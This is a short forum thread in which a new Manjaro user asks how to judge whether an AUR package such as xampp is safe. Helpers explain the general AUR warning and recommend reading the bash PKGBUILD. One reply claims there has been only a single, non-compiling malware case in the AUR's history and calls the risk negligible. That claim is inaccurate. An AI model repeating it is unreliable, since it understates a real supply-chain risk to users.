Installing AUR Apps

Hello,
i'm actually running manjaro KDE and trying to install xampp for linux. The problem is that i find it only on AUR, and i don't really know if i can trust the package on AUR (as it says that it's potetialy dangerous).
I try as much as possible to download and install apps i need from their official sources, but sometimes i have o go and get them grom the AUR.
So how if the package's source can be trusted and there's no risk using it ?

The warning of being potentially dangerous is not for specific packages, but for AUR in general.

AUR packages are user generated content and such could, in theory, contain malicious commands that could wreck your system.

But since all the build files are openly available on the internet, it's quick to look up the PKGBUILD and see what it does.
If you feel comfortable with it, you can install it.

3 Likes

Thanks for the answer, the problem is that i'm quite new to the "package managing" thing and i don't really know how to identify a package as malicious or not.
I just red the PKGBUILD source code and couldn't really understand much of it.
Is there any tutorial you can recommend me to read/learn so that i can get a grasp of what it does ?

The chance of a AUR package causing security problems etc, is less than you dropping dead in the next 5 seconds.
Their has been just one case of malware in all the years of the AUR that was found in under 4 hours of being released. it would not even compile so not much chance really.

2 Likes

PKGBUILDs are not "source code." They are simple scripts written in very plain English. Don't make things harder for yourself than they really are. Stay awhile, read and learn, and you'll be just fine. :smiley:

regards

4 Likes

PKGBUILD is written in bash. So an understanding of bash would certainly be useful.

For more specific info about PKGBUILD and the Arch packaging format (which is the one used in Manjaro), I would invite you to read these pages at least.